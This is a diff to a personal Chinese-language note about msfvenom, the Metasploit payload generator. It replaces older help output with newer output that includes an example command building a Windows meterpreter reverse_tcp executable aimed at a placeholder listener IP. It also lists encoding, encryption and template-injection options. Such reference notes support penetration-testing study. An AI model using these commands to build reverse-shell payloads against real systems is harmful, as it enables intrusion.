bravery9/notes_private/sec_msfvenom.md

 **msfvenom**是Metasploit框架中独立的payload生成器。
 （2015.6.8取代了之前的 `msfpayload` 和 `msfencode`）

-### msfvenom所有命令
+### 帮助信息

 ```
-root@kali:~# msfvenom -h
+msfvenom --help
 MsfVenom - a Metasploit standalone payload generator.
 Also a replacement for msfpayload and msfencode.
 Usage: /usr/bin/msfvenom [options] <var=val>
+Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

 Options:
+    -l, --list            <type>     List all modules for [type].
+Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-    -p, --payload       <payload>    Payload to use.
-Specify a '-' or stdin to use custom payloads
+    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments).
+Specify '-' or STDIN for custom
-        --payload-options            List the payload's standard options
-    -l, --list          [type]       List a module type.
-Options are: payloads, encoders, nops, all
+        --list-options               List --payload <value>'s standard, advanced and evasion options
+    -f, --format          <format>   Output format (use --list formats to list)
+    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
+        --sec-name        <value>    The new section name to use when generating large Windows binaries.
+Default: random 4-character alpha string
+        --smallest                   Generate the smallest possible payload using all available encoders
+        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
+        --encrypt-key     <value>    A key to be used for --encrypt
+        --encrypt-iv      <value>    An initialization vector for --encrypt
+    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
+        --platform        <platform> The platform for --payload (use --list platforms to list)
+    -o, --out             <path>     Save the payload to a file
+    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
     -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
-    -f, --format        <format>     Output format (use --help-formats for a list)
-        --help-formats               List available formats
-    -e, --encoder       <encoder>    The encoder to use
-    -a, --arch          <arch>       The architecture to use
-        --platform      <platform>   The platform of the payload
-        --help-platforms             List available platforms
+        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
     -s, --space           <length>   The maximum size of the resulting payload
         --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
-    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
     -i, --iterations      <count>    The number of times to encode the payload
     -c, --add-code        <path>     Specify an additional win32 shellcode file to include
     -x, --template        <path>     Specify a custom executable file to use as a template
-    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
+    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
-    -o, --out           <path>       Save the payload
-    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
+    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
-        --smallest                   Generate the smallest possible payload
+    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
     -h, --help                       Show this message
 ```